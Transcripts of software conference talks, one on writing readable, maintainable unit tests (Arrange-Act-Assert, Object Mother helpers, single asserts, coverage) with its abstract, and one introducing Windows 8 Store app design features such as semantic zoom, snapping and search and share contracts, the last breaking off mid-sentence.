a clown, I would really recommend this next talk in Room 1 on building enterprise IPs to apps with SharePoint and JavaScript. So all I can say, dare to wear the foolish clown face, go out, experiment, have fun, enjoy the rest of the conference. Thanks. Thank you.
|
Talk 1: ScriptCS - Justin Rusbatch Talk 2: Making node.js behave synchronously - Christian Amor Kvalheim Talk 3: From program to platform: mindset to develop public API - Katya Mustafina Talk 4: Enable Continuous Delivery for your Web/Server apps in 10 min - Jon Arild Tørresdal Talk 5: The Enterprise Clown builds SP2013 apps with node.js - Bjørn Einar Bjartnes
|
10.5446/51457 (DOI)
|
Hi. Before we start, I wanted to ask a question. Who is writing unit tests? Super. Many people write unit tests. We will use C-sharp. Many people use C-sharp. Java. C++. Because two people, three people. Right. So, did you ever have a problem maintaining your tests and trying to read it and not understand it? Have you ever spent hours in understanding the test? Did anyone have this problem? Yeah, a few people. So, we'll talk about that. About how we can write the test that is easy to maintain. That it's easy to work with later on. My name is Kaisa Mostafina. I'm a developer. I developed software for about 17 years in different companies in countries. I worked for six years in the Norway Technology Center. Which is part of the biggest company that produces oil services. We produce software solutions for the oil industry. The flagship product we produce here in Norway is called Petrel. Petrel is a software that helps people find oil. That is a tool for surface modeling. If you're an oil industry, you can do with Petrel basically whatever you want. The coolest feature of Petrel is 3D visualization. That's why I have this cool picture on that slide. That is considered to be one of the largest of the packages in the world. It has hundreds, developed by hundreds of developers and millions of lines of code. This is a successful product that is being sold in all the continents. The key component of that success is automated testing. We have starting developing Petrel in 1995 here in Norway when TDD wasn't really around. We had to adapt to it. We had to start using it at some point. We have gone all the long way from total hate to total love. I will try to connect the good practices of writing a unit test to our experiences and to what worked and what didn't work for us. TDD, unit testing, it became a religious issue. Everybody is talking about it. Some people believe it. Some people are deep fanatics. Some people follow it to some degree. There are some people who don't think we don't need it. There are still some people like that. But generally, as a programming community, we have adapted to unit testing. We are all committed to spend some time to write tests for our software. That's generally happened because people tried it and saw the value of it. They realized there is a benefit for us. We started spending less time on bug fixing, less time on testing. Bug fixing has now been our favorite activity. So we recognize the value of it. We really like that. That is a value that we all share these days. Like 10 years ago, it would be normal to talk to someone and realize, okay, they don't have an automated test at all. They don't have automated tests. Today, it's nearly impossible to have that kind of conversation. I think everybody raised their hands when I asked people to write the test. I had this kind of talk recently with some peers who don't have unit tests. But that's actually immediately smells. They spend a lot of time bug fixing. They spend a lot of time testing. It's probably not that exciting on what they are doing on an everyday basis. So, and we have done a great job in using tests as our helpers. And this talk will be very much about there is more than we can do about that. Better quality with the less effort. And let's outline our problem statement here. So we are using automated tests and our safety net. Well spotted by Martin Fowler some years back who invented that acronym. So it's so easy to refactor. It's so easy to change the code that we have a test for. 
So we can easily detect the problem. And that is all very good. But then we write more code and more tests. And more code and more tests. And there are several releases we have gone through with these tests. And sometimes they start failing. We have to go back to them. We have to understand what is happening. And that brings us to maintenance problems. If you cannot easily detect what is happening with the test, if readability is bad, then we spend a lot of time on that. And I spoke to some colleagues some years back and they had just started doing Scrum in their team. And that iterative development actually made it very visible what they are doing immediately. And they were complaining like, we spend an iteration just fixing the unit tests. And the next iteration we spend just fixing the unit tests. We are not doing anything good. We are just fixing the unit tests. And that is the situation that we want to avoid. We don't want our safety net to bring us to this. We don't want that. We want to spend less time on maintaining our test base. We want to make it easy. And at the end we are not paid to write tests. If we could ship the software without the testing machinery, that's fine. And no one would ask us, where is your automated test suite? That would be fine. But this is our own internal tool to do that. So let's talk about what makes this hard to maintain, and what we can do to make things easy to maintain. And here we come to the question: what is a good test? And looking at a good test, what can we think about? Can we think about how it looks? Can we think about what it tests, which is coverage? Can we think about coverage? And we talk about coverage all the time. It's our main metric of quality. But generally, should we think about coverage or should we think about other things? Should we think about when we run our tests? Do we run them all at the same time? Or should we probably run some integration tests afterwards? Or where we test? Which part of the code we choose to test? Or should we blindly follow the coverage and aim for the coverage? We'll talk about that in a minute. And the first thing I wanted to talk about is readability. We'll talk about how a test reads. Anyone had that situation? Some people had. Right. And why do we care about readability at all? That is not production code. And the thing is that we want our test to fail at some time in the future. Anyone had a situation when someone told you, okay, I had written that test and that was so good because it saved me so much time afterwards? Unfortunately, we cannot predict it. But we actually want them to fail sometime in the future. And when it fails, someone needs to go and understand why it fails. What happened, actually? And we want to minimize that effort, because at this point we are doing something else. We are developing software that is maybe not related to what this test is doing and that part of the software that we have written. So when we do that, if you have to spend a lot of time actually understanding and maintaining the test, that is a pain for us. We don't want that context switch. We want to continue what we were doing. We want this to be a light activity: go and understand the test, fix it, and then go on. And I really like the Roy Osherove phrase that he wrote in his book, who said that readability is the connecting thread between the one who wrote the test and the poor soul who will read it a few months later. Tests are stories that we tell the next generation of programmers in the project.
And that is so true. We want to tell that story and we will tell a good story. So let's look at the thing that would actually help us to reach, to achieve readability. How can we get there, to write a good readable test? And let's look at the pattern that is called Arrange-Act-Assert. Anyone using that pattern when writing their tests? Yeah, a few people. And that has been blogged about, I think, in 2003. So I have a link below that. And it's very simple. It couldn't be simpler. But it actually explains what data is being set up, what code is being executed, what concerns we are interested in in this test, and what kind of verification we do. So when we actually organize our test with Arrange-Act-Assert, it becomes so easy to achieve readability and to help people, those poor souls who will read it a few months later. So before we go and look at each step of Arrange, Act and Assert, let's look at an example. That is an example that is trying to test something. And I called it the messy test example. Is it easy to understand what it is doing? Can we easily identify what is actually happening in this test? It's probably not that easy. So let's look where Arrange, Act and Assert are in this test. Let's look at that. So if you try to understand and read it carefully, and it took me some time to actually color it and understand it, you are setting up something and then you are doing some mix of assertion and execution, and then you are setting up something else, then you are doing something more, and you are doing all of that stuff. And I think if we look at that test, we see several Arranges, and sometimes Arrange, Act and Assert are even mixed up, all three together. So someone who will read that test will be actually confused. What is this setting up? What is happening? What is going to be verified? And he is going to spend a lot of time to understand it, and he doesn't want that. So maybe one day he will say, okay, I'll look at that later on. I'll put this test on hold. I'll mute it until sometime. And that actually never works, because there is a tendency for this test to stay there forever. So that is a violation example. So what can we do to make it better? Let's look at the Arrange part. The Arrange part is responsible for data setup. And the important thing here is that it is all consolidated at the beginning of the test. It's not that you set up something, then execute something, then set up something more, execute something. We are setting this up at the beginning of the test. And to do that, there are several patterns that I use to clarify what you are setting up. Two of them, for example, are Object Mother and fluent interface. Those are patterns that we can use, and I'll go into an example in a minute just to clarify what is being set up. There are some links to Martin Fowler where you can read more about them. Let's look at the example again. So this is another example. And that's quite simple. So let's look at the test on the left. What is it actually doing? It is trying to set up some points. What is this for? It is trying to create some plane. So probably Point3 is a class that is a point in a three-dimensional coordinate system. And then Plane3, some plane in space. But what is this? What is this? 0, 0, 0, 1, 0, 0, 1, 1, 0. We have to kind of think about it. Why are those digits here, and stuff like that? And that is an Arrange part. It is consolidated at the beginning, but we can't actually read what is happening here very well, just at a glance.
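As a rough C# illustration of the kind of Arrange being described here, a sketch in NUnit-style syntax; the Point3 and Plane3 types, the method name and the coordinate values are hypothetical stand-ins for the slide code, not the actual demo:

```csharp
using NUnit.Framework;

[TestFixture]
public class PlaneTests
{
    [Test]
    public void Test17()
    {
        // Arrange: raw constructor calls with magic numbers.
        // Technically consolidated at the top, but the reader still has to
        // decode what these nine coordinates actually represent.
        // (Point3 and Plane3 are hypothetical domain types.)
        var plane = new Plane3(new Point3(0, 0, 0),
                               new Point3(1, 0, 0),
                               new Point3(1, 1, 0));
        var point = new Point3(0, 0, 5);

        // ... act and assert follow ...
    }
}
```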
So let's look at what we can do. What are we actually doing? I will call it: we are creating the XY plane. We are creating the XY plane here by those numbers 0, 0, 0, 1, 0, 0, 1, 1, 1. That is just the XY plane, the plane perpendicular, or orthogonal, to the Z axis. This plane is well-known and people understand what it is. So we can just create a method, a helper method, that would just create the XY plane, and name it so that it says we are creating the XY plane. And if you go to the right-hand side, the one who is reading actually understands that this is the XY plane being created. Okay, I understand that. And what is the point? Where is this point? We create a point at the axis. So we understand there is a point exactly on the axis that we are creating. And that is the data that we are going to test. So these are the helper methods, and we could call them Object Mothers. Those are methods that we consolidated to actually give better readability for this test, with a simple example. And we emphasize what data is being set up. And we can actually abstract away from the constructor details as well. And we can reuse it in several other classes. And we can create objects that we are familiar with. For example, we can create a diagonal plane. And we can create a horizontal plane. And we can work with those objects in our test framework, in our communication framework. So we understand what kind of dummy objects we are creating to test. And those helper methods actually serve us as a mother for those objects. There are many ways to create the XY plane, but we only use those points. But we don't want to know what kind of points we use; we want to abstract away those details. That makes our test readable and our setup readable. And fluent interface, I don't have an example, but it's very similar: if you have a long constructor, you can actually set up special With-style methods, say I have a girl with a balloon or a girl without a balloon, and then you can build that particular object and return it. So you create a specific set of dummy objects that you are working with in your test framework. And that is very handy. And this is very good for readability. So that was Arrange. And there are more patterns for Arrange. There is this book, xUnit Test Patterns, that Gerard Meszaros has written. It explains all of these things in detail. It's 900 pages, if you want to read it. Let's look at the Act. What is the Act, actually? It is code execution. So what can we say about it? We just execute the code. But there are some things that we can think about as best practices. We should make it clearly visible. Yeah, some people insert asserts in the Act part. That shouldn't be there. We should assume everything works here. We are only executing what we are trying to execute. We don't know anything else. And if we want to actually isolate ourselves from the environment, we can use stubbing and mocking, and use different dummy or fake objects for those that our object depends on, to make it isolated. Let's look at this example again. What is this Act part? It's not quite clear. It's actually here. And it's mixed up with assert. So the one who is reading that has to read it like just one long line, which is not very handy. I think it's just mixed up. But on the right-hand side, we can see a call. And we can actually understand what is happening here. We actually take a plane and calculate a distance to a point. And we get this number.
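A minimal C# sketch of what such Object Mother helpers might look like, using the same hypothetical Point3 and Plane3 types as in the sketch above; the class and method names (Planes.CreateXYPlane, Points.CreatePointOnZAxis) are illustrative choices, not the speaker's actual code:

```csharp
// Object Mother helpers: named factory methods that hide constructor details
// and give the dummy objects names the reader already understands.
// (Plane3 and Point3 are hypothetical domain types.)
public static class Planes
{
    public static Plane3 CreateXYPlane()
    {
        return new Plane3(new Point3(0, 0, 0),
                          new Point3(1, 0, 0),
                          new Point3(1, 1, 0));
    }
}

public static class Points
{
    public static Point3 CreatePointOnZAxis(double z)
    {
        return new Point3(0, 0, z);
    }
}
```

Inside the test, the Arrange then becomes a line like var plane = Planes.CreateXYPlane(); and the Act is a single readable call such as plane.DistanceTo(point).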
That's what the one who is reading the test would be interested in. And this is much more readable than what we have here on the left-hand side. So the Act is separated here. And it is clearly visible. And those are some other examples of Act, that is what we do here: we just execute some code, calculate some context, do the work that we need to do. And now we come to Assert. The Assert is a verification stage. It could be state verification and it could be behavior verification. State verification is where we verify the state of our objects, what happened to our objects, what their state is. And behavior verification is a little bit more tricky, where we verify how our object influenced another object. Has it been called? Those are also patterns, and we should do one or the other, not a mix of them. And the best practice here is to have one assert. So, why should we have one assert? Mostly it is because you will never execute multiple asserts in the test. The test framework won't let you do that, whatever the test framework is. The Microsoft framework or NUnit, they will just stop at the first failing assertion. That's how they are designed. And you will never be able to execute all of them. But you want to focus on one thing, on what you are doing. And you want to write a clear message for that assertion, what actually happened. This is only achievable with one assert. And if, for example, some people try to write several asserts that check different properties of one object, it is easier to just compare whole objects. And just one assert should be a rule, I think, for everybody. Let's look at the example here. So here we have two asserts. That is testing completely different things. So we actually can divide this test into two different tests. But on the right-hand side, it is clearly visible what is being tested in the assertion. So that was Arrange-Act-Assert. A pattern that, if you use it, you actually almost achieve readability for free. Because I used to write messy tests myself. And when I was trying to understand what a test is doing, mine or someone else's, it's just: what concerns are being tested? What data is being set up? And what is being verified? And once you answer those questions for yourself, it is easy to decide what actually happened in the code. But what else can we think about when we think about how the test should look and what it should do? Let's talk about the test scope. The scope of the test. It should test one thing. It should focus on one thing to test, not on multiple things, on multiple aspects, maybe on multiple properties of an object. An indication that we are testing several things would be that we have some logic in the test. If you have an if statement, if you have a switch statement, if you have a for loop, there is a very high probability that we are testing different things in one test. That we are trying to test multiple aspects of it. And of course, if you have multiple asserts, we are almost certainly testing different things. If you are wondering about that, you can try to name your test just by looking at all the asserts and writing the sentence of what this test is doing; you get a long sentence if you have multiple asserts. It will be several things. So it's a good practice to have one thing, and it will help people to understand later how the test works, what the test is testing, and the size of it.
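Putting those pieces together, a small Arrange-Act-Assert test with one assert and a descriptive name might look like this. NUnit syntax; the helper methods and geometry types are the hypothetical ones from the sketches above, not the talk's slide code:

```csharp
[Test]
public void DistanceFromXYPlaneToPointOnZAxis_EqualsTheZCoordinate()
{
    // Arrange (hypothetical Object Mother helpers from the earlier sketch)
    var plane = Planes.CreateXYPlane();
    var point = Points.CreatePointOnZAxis(5);

    // Act
    var distance = plane.DistanceTo(point);

    // Assert: one assert, one concern, with a message for the poor soul reading the failure
    Assert.AreEqual(5.0, distance, 1e-9,
        "distance from the XY plane should equal the point's Z coordinate");
}
```

Note that the body is only a handful of lines, which ties in with the test-size discussion that follows.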
What is a good test size? That is a religious issue again. So I believe in five lines. Some people believe in maybe another amount. But generally, I think the perfect test is a five line, maybe six lines, I don't know the exact number, but again, it's a religious issue. I think six, I can imagine the test that would have 16 lines and would still test in one thing. I have never seen test 25 lines testing one thing ever. Anyone seen that? Okay. And that was testing different things. Yes. So it should be small and I believe this function should be small, but the test should be small to test one thing, to focus on one concern. And let's look at the good test naming. That is very interesting issue. So we have that concept, don't repeat yourself in coding. That means we are, we want to remove duplication. Duplication is a maintenance for us. We don't want that in a code. We don't want to repeat ourselves. But from the other side, we have the idea of writing everything in descriptive and meaningful phrases which is coming to us from the main specific languages. And there is kind of a balance between it because the more we write in descriptive and meaningful phrases, we could actually violate that don't repeat yourself principle. And I think test lives in its own little world. It's isolated. It shouldn't have any knowledge from the outside world. And because of that, sometimes trying to remove duplication, we are actually sacrificing the business logic and the meaning of the test. So in testing, being descriptive and meaningful is more important than removing duplication. Sometimes that's fine to have some sort of duplication in a test than actually trying to force people to read some other code. I was actually struggling to get an example for that. I actually pulled out some code I written a while back and that was a good explanation. But it was so difficult to understand in such a short time. So I just removed the example. But think about that. And being descriptive is much more important in tests because they live in their own little world. And that's fine if you repeat sometimes. It's a test code at the end. It's never executed in production. Good test coverage. That is my favorite slide. How much we should test? We talk about coverage all the time. Management uses it as a metric to detect quality. Is it really true? So I will tell you a story. Three programmers asked the gray master of what coverage should I aim for. The first one asked and the great master said, don't worry about that. Just go and try some good tests. And the second one asked about that. What coverage should I aim? The great master said, how many grain rice should I put in that pot? That depends on the second programmer. It depends because how many people you have to feed. What other food you're serving. What actually you are, what is this, how hungry they are. And those things are how I can tell you. That's what he said. And the master said, yeah, that's right. And that programmer left. And the third one came. What coverage should I aim for? 80% at no less. Said the great master. And then the followers came to the great master and asked him, we heard that you did the three different answers to the same questions to different people why it is. And he said, the first one was new to unit testing. So he had to just focus on writing some good tests. And the second one was experienced. So he understood and realized with my answer that there is no simple answer to that. 
The third one just wanted a simple answer to a question that doesn't have any simple answer. So he got it: 80% and no less. And with coverage, it is very important that we balance. Does anyone have 100% coverage? We keep saying that we just have to do it. Do we have to blindly follow the coverage? Do we have to blindly aim for 100% or 80% or whatever simple number? There may be some projects with 100% coverage; they still have bugs in them. We have to focus on something else than just test coverage. We have to focus on what we are testing and where we are testing. And we can also talk about coverage duplication here. And this brings us more to the question of when we are testing. So we have isolated tests that test local things, where isolation is the result of stubbing and mocking. And we have tests that are integration tests. The isolated tests are what unit tests usually refer to. So we are focusing on one class, one object. It's very local. And then we have end-to-end tests. And we have to have end-to-end tests, because there is no way we can say we have tested the system if we don't have end-to-end tests. However, has anyone had a situation where one change in the code broke hundreds of tests? Yeah, a few people. That happens because we have some coverage duplication in our tests. And the good practice that we found here is to run the isolated, local tests first and make sure that our local pieces work fine, and then run our integration tests, the end-to-end tests, afterwards. And there should be way fewer integration tests than local tests. That's a normal situation. And then when we run the integration tests, there are just a few. They test the actual communication between components. They don't test the local things. And we call those the smoke tests that we run. We run them first. And we make sure everything is fine. And then we can allow execution of the integration tests. So that is a very good practice that we found for ourselves. Good tests fail. And they do fail. And we want them to fail. But we want them to fail for just one reason. The one good reason is that the functionality, the code, changed. We don't want tests to fail randomly due to some isolation problems. We don't want them to fail because there are bugs in them. We want them to fail just because we changed the code and it fails, and there is a dependency on that. We don't want random failures. But it appears that random failures, isolation problems and test bugs are quite easy to fix. What is difficult is to get the tests to fail where we want them to. We want to write a test that will save us some time in the future, but we cannot predict the future very well. How can we predict the failure information? Where should I test? Each test is associated with a cost. I have to spend time writing it. People have to spend time executing it. And we have to think carefully about how we are going to write the test, and where. And here is Kent Beck. And he said: I should test where I'm likely to make a mistake, not the things that always work. That's fine. But how do we know where we'll make a mistake? That is a probabilistic investment. We don't know. That's a bet. But we can think about it, maybe. And he's saying, for example: I tend to make mistakes around conditionals, so I try to write tests around conditionals, because I know I'm making mistakes there. But what else can we think about when we talk about the value of a good test? Can we predict the failure information? We normally don't think about it very much.
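To make that advice about conditionals concrete, here is a small, entirely hypothetical C# example (not from the talk's slides) of a test aimed at the boundary of a conditional, the kind of place where mistakes are most likely:

```csharp
// Hypothetical production code with a conditional that is easy to get wrong:
// writing '<' instead of '<=' is a classic off-by-one mistake.
public class Account
{
    public decimal Balance { get; private set; }

    public Account(decimal balance)
    {
        Balance = balance;
    }

    public bool CanWithdraw(decimal amount)
    {
        return amount <= Balance;
    }
}

[TestFixture]
public class AccountTests
{
    [Test]
    public void CanWithdraw_AmountExactlyEqualToBalance_IsAllowed()
    {
        // Arrange
        var account = new Account(100m);

        // Act
        var allowed = account.CanWithdraw(100m);

        // Assert: targets the boundary of the conditional, where a mistake is most likely
        Assert.IsTrue(allowed);
    }
}
```

Temporarily flipping the comparison to '<' and watching this test go red is a cheap way to check that the test really guards the spot you care about, which is exactly the exercise described next.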
But if you have a test and you have the code and everything works, can we think about when it will fail? We can try to comment out production code and watch whether the test fails. We can try to change the production code in a way that we think it will evolve in the future and watch whether it fails. That is a very good exercise in determining when the test will fail. And we normally never do that exercise when we write the test. We can look at the tests as an API, as documentation for our code. This is a very good practice as well, because we are seeing what we are trying to achieve. And here we can maybe predict how it will evolve, how it will change. So we want to write tests when we feel they are valuable, but not before. And that is something we can think about when we write the test: which test to write and which test not to write. So what is a good test? The question that we ask ourselves when we write a good test is: how easily can I understand it? And more important is not how easily I can understand it, but how easily someone else would be able to understand it. It is very, very likely that you will not be the one reading that test. You are doing it for your peers. You are doing it for the poor soul who will come to the project a few months later and say, ah. And then: when will it fail? What kind of mistake would I have to make so that it fails? And where can I predict the bug? And we can think about coverage, of course. And we should think about coverage. But we should understand that there is no simple answer to the coverage question. So we figure that for a good test, when we look from the maintainability point of view, it is more important to think about how it looks and where it tests than to think about when it will be run, what exactly it is testing, and the coverage. That was it. Thank you very much.
|
A little over 10 years ago, we learned and adopted test-driven development (TDD). TDD is a huge step forward for software quality, as well as for the value of your software as a company asset. Functionalities and architectures wrapped with tests can be changed under control and can evolve, which is one of the biggest achievements in the industry during the last decade. When the codebase grows in size and complexity and dependencies start degrading team productivity, the problem of how to maintain the automated test base takes the stage. Production code changes over time due to new functionality, bug fixes, etc., and this affects the tests' code and the lifetime of the tests. If a test fails due to changes in the code, it means an error has been detected early and the test has done its job. This is the point where a developer should fix the problem, and the key to the fix is understanding the test and why it fails. This makes good test design a key component of continuous integration. We cannot submit on a red build, and then we cannot change and develop our application. We generally want to run the whole test suite before every code change submission, and how long it takes to run plays a significant role for big projects. If the whole test suite takes more than 15 minutes, it becomes an obstacle to making frequent changes. Teams start running less than the full suite, or try to detect the tests relevant to a particular change, etc. The problem of redundancy in unit testing, due to the large number of people working on a project, becomes important once the test code has grown in size. Developers write tests for their components, and some tests overlap each other, often covering the same code over and over again. This is not a problem from a quality point of view, but maintenance can be an issue. Here we come to the distinction between unit tests and integration tests. An important quality metric is code coverage. There are aspects that this metric does not reflect, such as sensitivity to input data. Many workflows depend vitally on input data: a small difference in the data may only add a couple of lines of code to the coverage, but it makes a huge difference in the calculations and final results. However, we often do not take these effects into account when measuring quality metrics. Our most valuable tests are those that fail more often than others. The right test is a test that consciously addresses the right scope, has a predictable time to run, and is easy to understand when it fails. In my talk I will be speaking about how good test design affects the productivity of an agile project based on a large, legacy codebase. I will focus on lessons learned from an existing project I have been involved with, with examples of good and bad test design and their consequences for project delivery. I will also give live code examples along the way.
|
10.5446/51458 (DOI)
|
Can everyone understand me? Yeah? Okay. Welcome to this session. It's Windows 8 introduction session. So let me first quickly set the stage so everyone knows what to expect. As this is an introductory session, I am going to walk you through a Windows 8 application. Look at some of the trades that make up a good Windows 8 application like semantic zooming and snapping and stuff like that. And after that, I am going to show you in code how that's done. So it is an introductory session, but it does require a little bit of XAML and C-sharp knowledge. Otherwise, it might be a bit hard to follow. Okay. So with that out of the way, let me start by introducing myself. My name is Kevin. I am a technical consultant at Will Dolman. I have worked there for about nine years now, I think, and actually started off building WinForms applications, after which I went to web applications. So I did quite a bit of ASP.NET web forms, C-sharp. And at a certain time, Silverlight came about. So all of a sudden, there was this new, stateful, web-like thingy from Microsoft. So I threw myself into that. And after that, well, XAML was kind of a given. So Windows Store applications came about. And due to the XAML knowledge I already had from Silverlight, I kind of rolled into building Windows Store applications. And that's what I do now. I mainly build Windows Store applications for my company and still some ASP.NET MVC stuff. If you want to contact me, the easiest way by far is probably Twitter. You can find my handle on there. Or you can also drop me a mail if you want. By the way, I also have an app in the Windows Store. It's a bit of a Facebook app. So if you're looking for that, you might want to check this one out. Anyway, what are we going to talk about today? Well, as I said, I'm going to guide you through a Windows Store application. It's one I built. And we're going to look at what makes up a great Windows Store application. And then we're going to go into all this stuff. And we're going to look into each of them one by one to see how it's done. So we'll start by how we can lay out our data and how we can group our data. There's a few controls built into Windows Store SDK for that. Now we're going to look into semantic zooming. Of course, I'm going to explain you all of this first. And then we're looking into how we can enable that in our application, which is actually terribly easy. Then we'll look at how we can snap our app or what we have to do when we're developing an application to ensure our app is snapable. Because Windows 8 applications do have to be snapable if you want to make sure they're approved for Windows Store. We'll also look into a few navigation patterns, different ways you can navigate through your application. Maybe a quick question. I don't really see all of you, but have you guys worked with Windows 8 already? Yeah? A few of you have, a few of you haven't. Well, for those who have, don't come as a surprise, but for those who haven't, Windows 8 applications and the way they behave to Microsoft Design is quite different from what we're probably used to building WinForms, WPF, Silverlight, or Web applications. So there's new design language and that new design language comes with a few things we, even as developers, have to keep in mind. Navigation patterns, one of those. We'll also look into how we can add a command bar. 
And then we're going to go into, well, as far as I'm concerned, one of the more interesting things about these applications and that is the contracts, being, searching, settings, and sharing data. Because as far as Microsoft is concerned and new Microsoft Design style is concerned, your application isn't on its own anymore. If a user has a bunch of applications on his machine, on his tablet, whatever, why not let these applications work together? And that's what these contracts are for. So we will see how we can make our application leverage features from another machine. And we'll also look into how we can build a nice lifestyle, which is what you see on the Metro or Windows Store design style start screen. Of course, that's not all there is. I have one hour, so I can just more or less touch the beginning of what's there. So I'll quickly go over a few other things that might be worth looking into. And I hope I have a few minutes left for Q&A at the end. This, by the way, makes up for about 40 slides. Don't worry, I'm not going to show all of them, but I did put them in the slide tag, so you can have them as reference afterwards. You can just download the code and the slide tag afterwards. So as I promised, I'm going to show Windows 8 application first. I have one up and running here. Does anyone remember Woodgrove? No? That was actually a demo used for Microsoft a few years ago once they started with Silverlight. It's a banking application. So the general idea is this application shows you the products that are available in a bank. So what we've got here is our bank name and our products grouped by category. Category credit cards, a bunch of credit cards, and like that you can go to the other products this bank might have. Now the first thing you might notice here is, well, the first thing I notice at least, there's no clutter. There's no menu bar. There's no status bar. There's none of that. That's the design principle and that's called content before Chrome. That's actually very important because it goes through all the principles of building a Windows 8 application. In general, it means don't clutter your user interface with commands, don't clutter your user interface with menu bars, simply don't clutter your user interface, but give preference to the content. When the user looks at your application, he's probably more interested in the content than where he is now, than what he can do with the content because that are commands he only needs when he wants to effectively do something and to where he can go. So that's the first thing you'll immediately notice, content before Chrome. It comes back everywhere. The second thing I've already shown you is horizontal scrolling thing. That's also something that's very common in Windows 8 applications. I'm working landscape mode and they typically scroll horizontally versus the regular applications that might scroll vertically. It's not necessary but it's kind of a nice touch in my head. Now, you might see this page as a bit of a hub page. The user comes into the page. The user comes into the application. This page is the first thing he sees. It has group data, but there might be quite a lot of data on the screen. In this case, I have like five groups, I think, credit cards with a bunch of them, housing loans, investment products, up to services. That's still okay if you've got five categories, but imagine there are 20 categories and each category has 20 products of its own. 
If the user wants to go to a certain category, that might become very, very annoying. So how do you actually navigate to a category like that? Well, that's why a principle called semantic zoom was introduced in Windows applications. Semantic zooming is what you get when you do this. I use control and mouse scroll to zoom out of my data. If you're on a tablet or something touch enabled, you can just pinch to zoom out. Semantic zooming allows you to get an upper view, let's say, of your data. In this case, I zoom out and I zoom out to the category level. Once I click or tap one of these items, I'm immediately more or less at the group I wanted to go to. So that's actually a pretty nice way of navigating through your data. You just zoom out on the data, you tap and you're zoomed in again right where you want to be. Important, by the way, if you're using semantic zoom is the context. So you're zooming out on data, you're not supposed to end up in some completely other kind of data. Just to give a bad example, if I'm on this page and I have a bunch of banking products and I zoom out, I do not all of a sudden want to be on an employee management page. Just to say something. Right, so that's for navigating in your data on the same screen. But obviously, there must be other ways of navigating. And one of the ways of navigating, there's actually two that are used nicely together. One of the ways is just on screen commands. And this is very, very common and users are very, very used to this because it's more or less how links on the web tend to work. You just tap a group, header in this case. And all of a sudden, I'm in the investment products category and I can tap even further and I'm at the detailed page of some products. If I want to navigate back, I simply have a back button here. So that's on Canvas commands for navigating. Now, there are of course other ways of navigating. You might have an application that consists of different modules. For example, this banking product module might also have a disbanking application, might have a banking products module, but it might also have a reporting module or an employee management module. To navigate to those, Microsoft introduced something called navigation bar. And you get it by right clicking or just swiping from the top of your screen down. And that's actually just a bar in which you can put some buttons. In my case, my app has exactly one module, so it's quite easy. So that's another way of navigating. And when I was talking in the beginning about content before Chrome, well, you might wonder, what if I want to do something with one of these products? Well, let's click one. Let's say I want to pin this to my start screen or whatever, then you need some kind of way to have a command on this product. In commands, they go not on screen, but they go in the command bar. Yup, that's the wrong click. Here we go. In command bar, that's the bar at the bottom of your screen. So navigation bar on top, command bar at the bottom, in which commands related to that screen should go. Now, that's a simple example. You can also have context sensitive commands in your command bar. For example, a list of products, and you want to delete each of them. You just select all four of them. Command bar pops up, and once an item has been selected, you can have a delete button right there. So the delete button goes in the command bar, and not as you can have in typical web or in forms application right next to each record. Why? 
Well, again, this principle comes from the content before Chrome. Content on your screen, Chrome, only when you need it. Now, these are design principles. You will see applications in which there are commands on the screen. A good example of this might be, well, imagine you have a shopping application, and your user wants to check out, or you have these baskets of shopping items. Well, that's typically a command that could go on screen, because it's very essential to the application. But most of the commands sorting, deleting, selecting should go in the command bar. Now, I'm telling you all of this, and mostly when I do stuff like this, I start seeing very weird faces from the audience. Because they say, like, how the hell is my user supposed to know all this? Because the user is new to Windows 8 as well. Well, it's a bit chicken or egg thing. If you're one of the first people to build an application like this, well, probably your user is going to have some trouble adapting to it. But if all applications for Windows 8 adhere to the same design principles, it will work in your benefit afterwards, because the user will already be used to finding the commands in the command bar navigation on top from other applications. So after a while, the user will know where to find the commands and how to work with a Windows Store application. That's why it's quite important to keep to these principles. But, well, if you're one of the first, you will probably have to answer a lot of mail about where can I find commands to delete a credit card or something like that. Anyway, as you know, these Windows applications, they don't just run on laptops or desktops anymore. They also run on tablets. And they also run on a lot of form factors. So one of the things you can do when you're running on a tablet, for example, is running, or on this, is running two applications at the same time. And to enable that, you have something called Snap Mode for your application. And snapping an application, that's this. So I now just snapped my Windows Store application to the left of my screen. And this enables my user to run another application right next to it. In this case, I am running my Woodgrove application on the left, and I am running my desktop, which is, I'll just look at it as an application which can do more or less everything. That's the easiest way to explain this. Well, to my mom at least, so she understands. And when you're snapping, this effectively allows the user to work with two Metro Windows Store applications at the same time. Also important here is to not confuse the user. So when you snap, you just use the same data, and you keep in the same context. So I snapped the application, and it's still banking products on the left. It's not all of a sudden employees or something. So that's important, stay in the same context. By the way, interesting thing, you might know Windows 8.1 is coming up. One of the things that will be possible there is you will have a lot more possibilities as far as snapping is concerned. You will be able to run different applications next to each other instead of two, I think like four or something, and you will be able to make them bigger and smaller just as you wish. Okay, that's snapping an application. And then there's a, in my most interesting part and last part of this piece of the presentation. That's how these applications can work with the Windows system on one end and with other applications on the other end. That's done through contracts. 
For example, imagine I want to search through this application. That's a pretty common use case: search through the data in my application. What would typically happen? Well, you would probably make a search page and you have some filters, et cetera, et cetera. There's a better way to do this now, and that's through the search contract. Because Windows 8 has, on the right of your screen, the charms bar, which contains a few common commands, common functionality a lot of applications might have. And the general idea is that if you want, in this case, search in your application, you should direct your user to the search charm. And like that, you have a common way of searching through all the applications on your Windows system. The nice thing is, my application here is now the current one, the active one. So if I start typing and I press enter, I will search through my application. But as you can see, I have a list of other applications here. I have quite a lot of applications. These are installed applications on my computer that have told Windows: hello, Windows, I'm also searchable. So the nice thing is that from the search screen, in any part of Windows with any app active, I can just start searching through the active app, but I can also start searching through any other app. So that's actually pretty nice. Your user doesn't even have to have your application up and running or active to be able to search through it. You can just type in something, gold, let's type correctly, and well, the Woodgrove banking app is selected now, but I can just select any other one to start searching for gold through Facebook or Bing or whatever. I'm not going to do that. I haven't got the internet connected here. So I start searching. Do I have any? I have a gold credit card. I wish I had a gold credit card, but the application has a gold credit card, so I found that one. So that's as far as the searching is concerned, but I also said something about leveraging functionality from another application, and that's the really nice one. So imagine I'm reading about this gold credit card thing, and I'm thinking, well, I can't afford this, but maybe one of my friends can, and he can buy me lunch because I told him where he could find it. So I say, well, I want to share this information with one of my friends, and then you can use another charm, namely the share charm. That's too many S's in one sentence. And what will happen here is I have said to Windows: hello, Windows, my application can share this data. This data can be a URI, an image, text, HTML, whatever. And what Windows is going to do then is look through all the other applications installed on my system, and it's going to search for applications which have said to Windows: hello, Windows, I can handle that type of data. And the thing is, from the moment I tap one of these other applications, the other application will take over. So that means that I, as an application developer, no longer have to write code to share this on Facebook or on SkyDrive or on Twitter. I can just rely on the fact that if a user wants to share something on Facebook or on 